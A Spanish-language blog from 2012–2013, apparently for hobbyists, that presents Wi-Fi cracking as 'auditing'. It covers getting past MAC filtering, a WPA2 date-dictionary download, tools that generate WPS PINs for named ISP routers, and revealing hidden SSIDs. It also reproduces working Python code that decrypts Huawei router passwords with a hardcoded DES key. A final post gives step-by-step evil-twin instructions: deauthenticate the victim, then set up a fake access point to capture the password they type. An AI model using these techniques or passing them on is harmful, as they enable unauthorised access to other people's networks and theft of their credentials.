English plantillas curriculums vitae French cartas de amistad German documental Spain cartas de presentación Italian xo Dutch películas un link Russian templates google Portuguese foro de coches Japanese catálogos de Korean entrevistas a Arabic Chinese Simplified

TIENDAS WIFI:


Lo mejor en calidad-precio y rapidez bajo nuestra humilde opinión.
eiUFj

domingo, 27 de enero de 2013

Auditar claves WEP con Backtrack con filtrado de MAC:


Funciones útiles:

-Con esto se descubren redes que solo permiten  acceso a su router.

-Nos permite asociarnos al router en cuestión

-Con aircrack-ng siendo una red WEP,la clave es sacada en seguida.

-Mucha gente suele hacer esto y no sabe que es igual de inseguro hacer eso y no poner seguridad WPA2-PSK.

-Conclusión:Es una tontería hacer filtrado de MAC,si no pones una segunda seguridad.
Genfechas v0.2:



Esto es un generador de diccionario WPA2-PSK que da un archivo que contiene fechas en su interior,desde la fecha que pongais hasta la fecha a dia de hoy.

Este generador esta probado desde la fecha de 1950 a 2013,dando lugar a un archivo de 22.440.000 fechas pesando unos  265mb aprox.

Este generador es muy útil,puesto que mucha gente cambia su clave por defecto, y suele poner fechas de nacimiento en su mayoria,nombres,dni o números de móvil o fijo.

Darle las gracias a su creador moostrenko por su excelente idea en lampiweb.

DESCARGA:

http://ul.to/pktaaxfe

miércoles, 23 de enero de 2013

PINSWPSv3:


Esta versión de los señores de Lampiweb y Maripuri,añade numerosas mejoras en las bases de datos de las redes VodafoneXXXX.FTE-XXXX,WLAN_XXXX,WLAN_XX,belkin,Conceptronic y Linkshare.
Como ya sabéis,el objetivo de este programa,es sacar el security pin de la red en concreto.Simplemente es la versión mejorada de la antigua GUI’ PINWPSv2.

Hay WPSpins nuevos,os adjunto las macs añadidas:

FTE-XXXX
         04:C0:6F         
20:2B:C1
28:5F:DB
80:B6:86
84:A8:E4
B4:74:9F
BC:76:70
CC:96:A0

lunes, 21 de enero de 2013

Detectar usuario oculto desde Backtrack:


Tutorial ilustrativo:

En el tutorial nos enseñan paso a paso a reconocer el ESSID autentico del cliente a auditar.Esto nos es muy útil,puesto que si sabemos la compañia del cliente,nos será más facil extraer una clave .



Excepciones:




Si os saliera esto ''148'' en el canal,debeis ir probando los canales del 1 al 13,debido a que en la frecuencia 2,4Ghz SOLO HAY 13 CANALES WIRELESS.Os aseguro que sale,debido que a mi por ejemplo en el canal 9 me salio la red.


Si os saliera <length:  0>, quiere decir que la red NO TIENE NINGUN NOMBRE(Le quitaron el nombre a la red),por tanto ¿Como van ustedes a averiguar la red con mdk3 por fuerza bruta?No seria posible de esta manera.

Por la MAC podriamos saber que compañia es,y de que tipo,ej:WLAN_XXXX,WLAN_XX,etc…

lunes, 31 de diciembre de 2012

PINsWPS:



Este programa sirve para sacar  los patrones pin o mejor dicho ‘security pin’ de las redes vodafonexxxx,FTE-XXXX,Belkin y las nuevas WLAN_XXXX.

Esto tiene muchas ventajas ,debido a que con el security pin ya sacado directamente podemos sacar  las claves en programas típicos de auditorías como xiaopan,backtrack,wifiway,wifilax o reaver pro .En mi humilde opinión, el más intuitivo es xiaopan con la herramienta inflator.

En redes como vodafonexxxx,FTE-XXXX y orange-xxxx sin el security pin(en el proceso de reaver)  parece que te dejan asociar al  router ,pero no es asi, solo te dejan asociar  unos 60-90 segundos,luego te desautentifica de la red.Por tanto ,teniendo estos 8 digitos podemos sacar  la clave en un tiempo muy muy breve,debido a que pasa al 90% de reaver al meterla.

A lo que voy,gracias al equipo de Lampi y maripuri se creo esta GUI,la cual vale para bastantes MACS de las redes citadas.

Espero que les guste la aplicación:


Aqui están las pruebas señores,a mi juicio bastante evidentes:




lunes, 26 de noviembre de 2012

jueves, 22 de noviembre de 2012


 Routers Huawei  al DESCUBIERTO:

Para routers:



Huawei Quidway series
Huawei CX600

Otros modelos también pueden ser vulnerables,pero no fueron probados.


DETALLES DE LA VULNERABILIDAD:

Dispositivos de Huawei tienen un algoritmo de cifrado de contraseñas débiles. Con este esquema, las contraseñas son ofuscadas  y cifradas con DES, usando una clave de cifrado compartida entre todos los dispositivos afectados. Este esquema de cifrado no utiliza ningún mecanismo contraseña salteada. Como consecuencia, las contraseñas extraídas del dispositivo de una víctima puede ser descifrada de forma instantánea.

Un procedimiento de Python que decodifica una contraseña dada se incluye a continuación. Una vez terminado, el procedimiento decrypt_password () devuelve la contraseña en texto claro.

CÓDIGO:


from Crypto.Cipher import DES
def decode_char(c):
    if c == 'a':
        r = '?'
    else:
        r = c
    return ord(r) - ord('!')
def ascii_to_binary(s):
    assert len(s) == 24
    out = [0]*18
    i = 0
    j = 0
    for i in range(0, len(s), 4):
        y = decode_char(s[i + 0])
        y = (y << 6) & 0xffffff
        k = decode_char(s[i + 1])
        y = (y | k) & 0xffffff
        y = (y << 6) & 0xffffff
        k = decode_char(s[i + 2])
        y = (y | k) & 0xffffff
        y = (y << 6) & 0xffffff
        k = decode_char(s[i + 3])
        y = (y | k) & 0xffffff
        out[j+2] = chr(y       & 0xff)
        out[j+1] = chr((y>>8)  & 0xff)
        out[j+0] = chr((y>>16) & 0xff)
        j += 3
    return "".join(out)
def decrypt_password(p):
    r = ascii_to_binary(p)
    r = r[:16]
    d = DES.new("\x01\x02\x03\x04\x05\x06\x07\x08", DES.MODE_ECB)
    r = d.decrypt(r)
    return r.rstrip("\x00")
SOLUCIÓN: 
 Se recomienda almacenar las contraseñas utilizando un algoritmo de hash correcto, en lugar de aprovechar el cifrado simétrico. Por el momento, esta cuestión ha sido abordada por Huawei con aviso de seguridad Huawei-SA-20120827-01-CX600 ("Actualización asesoramiento de seguridad sobre el riesgo de que alguien irrumpa Contraseña Debido al algoritmo de cifrado DES"). Más detalles están disponibles en la siguiente URL:

http://support.huawei.com/enterprise/ReadLatestNewsAction.action?contentId=NEWS1000001141
AGRADECIMIENTOS:
 http://blog.emaze.net/
(No nos hacemos responsables del mal uso de esto) 

miércoles, 14 de noviembre de 2012

Preview de AP-Fake y Desautentificación:
(Hasta que lo expliquemos en español paso a paso)
(Esta es la idea para las vodafone y orange)


Más información aquí:
http://www.backtrack-linux.org/forums/showthread.php?t=49294
El programa que usa es éste:
http://code.google.com/p/pwn-star/downloads/list

AP-Fake Mejor explicado y en inglés:


 

lunes, 22 de octubre de 2012

Auditar redes WLAN_XXXX con WPA2-PSK con WIFIWAY 3.4:



100% DESENCRIPTADA


DESCARGAR WIFIWAY 3.4:

http://ul.to/vmyzlfln

domingo, 21 de octubre de 2012

AUDITANDO REDES VODAFONEXXXX Y ORANGE-XXXX:




SOLUCIÓN 'PARCHE' A LAS REDES 'SEGURAS' DE ORANGE-XXXX Y VODAFONEXXXX EN EL PROCESO DE OBTENCIÓN DE LA CLAVE A LA FUERZA.

(BASADO EN LA GUERRA SICOLÓGICA)

USO: EN BACKTRACK 5

RESUMEN BREVE:

Te pones a capturar una red Orange o vodafone (La tuya por Dios para probar)

Te pones a desautentificar la red hasta no poder más ,todas las que puedas,haciendo pensar que SU wifi ha muerto...

Creas un AP falso con el nombre de la red en cuestión (AP-FAKE)

De tanto conectarse y desconectarse,reiniciará el router y ahí le pedirá la contraseña de la red....(La suya o la falsa)(Si cae en la falsa...está hecho)

Cuando la persona en cuestión  meta la pass, se le mete la contraseña y......